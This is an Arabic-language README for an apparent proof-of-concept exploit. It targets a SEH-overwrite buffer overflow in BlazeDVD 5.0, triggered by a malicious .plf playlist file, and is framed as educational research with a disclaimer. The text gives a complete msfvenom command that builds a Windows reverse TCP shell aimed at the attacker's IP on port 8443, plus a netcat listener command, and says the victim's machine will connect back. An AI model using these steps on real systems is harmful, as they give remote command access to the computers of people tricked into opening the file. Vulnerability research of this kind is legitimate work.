
إثبات مفهوم لاستغلال تجاوز سعة المخزن المؤقت من نوع SEH في BlazeDVD 5.0 عبر ملف قائمة تشغيل .plf معدّل، مع توليد حمولة شل عكسية باستخدام msfvenom لأغراض البحث الأمني التعليمي.
إثبات المفهوم (PoC) لاستغلال ثغرة تجاوز سعة المخزن المؤقت في BlazeDVD الإصدار 5.0 عبر ملف قائمة تشغيل .plf مُعدّ. يستخدم الاستغلال الكتابة فوق معالج الاستثناءات المنظمة (SEH) لتحقيق تنفيذ الأوامر.
.plfهذا الكود مخصص لأغراض تعليمية وبحثية فقط. قد يؤدي أي إساءة استخدام لهذا الكود إلى انتهاك القوانين المحلية أو الدولية. لا أتحمل أي مسؤولية عن الأضرار الناجمة عن الاستخدام غير السليم.
يقوم الاستغلال بإنشاء ملف .plf خبيث، عند فتحه في BlazeDVD، يؤدي إلى تجاوز سعة المخزن المؤقت والكتابة فوق SEH (معالج الاستثناءات المنظمة)، مما يعيد توجيه التنفيذ إلى حمولة شل عكسية.
إنشاء شيل كود باستخدام msfvenom
استخدم msfvenom لإنشاء حمولة شل عكسية بتنسيق خام، مع تجنب الأحرف الضارة.
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=8443 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
استبدل الشيل كود داخل سكريبت الاستغلال بالمخرجات من msfvenom.
تشغيل Netcat (المستمع)
في طرفية أخرى، ابدأ الاستماع على المنفذ المحدد 8443:
nc -lvnp 8443
التقاط الشل العكسية
إذا نجح الأمر، ستتصل شل عكسية بالمستمع الخاص بك.